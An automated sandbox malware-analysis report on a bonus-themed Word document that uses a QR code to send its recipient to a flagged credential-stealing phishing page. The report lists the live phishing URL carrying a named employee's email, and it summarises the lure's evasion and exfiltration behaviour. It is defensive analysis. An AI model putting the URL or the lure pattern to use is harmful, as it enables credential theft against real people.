Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gioia Faggioli-End Of Year-Bonus.docx

Overview

General Information

Sample name:Gioia Faggioli-End Of Year-Bonus.docx
Analysis ID:1578343
MD5:5b1859de22f4394e324e103af9b2c79a
SHA1:e8d51177a7a5f04537af8ffc830ab44e7bfe0a3e
SHA256:33a01db697b9f3e1135e0f5fe67a56305fa6881e51bae55edede5c72d3cd0106
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • WINWORD.EXE (PID: 4012 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Gioia Faggioli-End Of Year-Bonus.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • chrome.exe (PID: 6384 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.com MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6604 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1928,i,6146988213687095418,5572660784010154810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.comSlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: Office documentJoe Sandbox AI: Office document contains QR code
Source: Screenshot id: 2Joe Sandbox AI: Screenshot id: 2 contains QR code
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg3... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a high likelihood of malicious intent, potentially to evade detection or analysis, and to redirect users to a potentially compromised or malicious site.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg3... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg3... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an untrusted domain, and it also redirects the user to a potentially malicious domain upon certain conditions. These behaviors are highly indicative of a malicious script, likely used for phishing or other malicious purposes.
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: d0676c1e-89a6-4479-ba3f-f370243a92944cd5429d-354e-4def-96a0-0b2ba74bbad2
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
Source: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.comHTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638702158679078693.ZDA2NzZjMWUtODlhNi00NDc5LWJhM2YtZjM3MDI0M2E5Mjk0NGNkNTQyOWQtMzU0ZS00ZGVmLTk2YTAtMGIyYmE3NGJiYWQy&ui_locales=en-US&mkt=en-US&client-request-id=be944b96-19d6-45d0-bf1c-bb1c151ba5a3&state=VA-X0yW0KUjx86bviJ8jaP1RHkO9MVgyDZCpOPta91OGQ2wnKj9wOzuJFUhVHlplPaudbCuErHDO1GAWltqHPbTnSq1sWNFYhAqg3_9qGRjnuzAU9PTM17G42V-KRPLm5xfE4dDAjtcF5hHBGM-GqNwWXO3acFnOU-QFpLOoHD9IjcDORRhIiCiKAlvuVo8Tnl1cyUDn-Y1qQ3X1L_cc7468i-j8WFhALyD3BSuw23iLFM2ZW1YjEH3F788xN3xjcig21YN-q0VjDE70usxbdDPdDSDGuPhW6IWD1Ka3PYKmJEbI71zvWpjMEWu9eU24p5Mi_Y_vXPb4-H98ZrPPqg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox ViewIP Address: 104.17.24.14 104.17.24.14
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
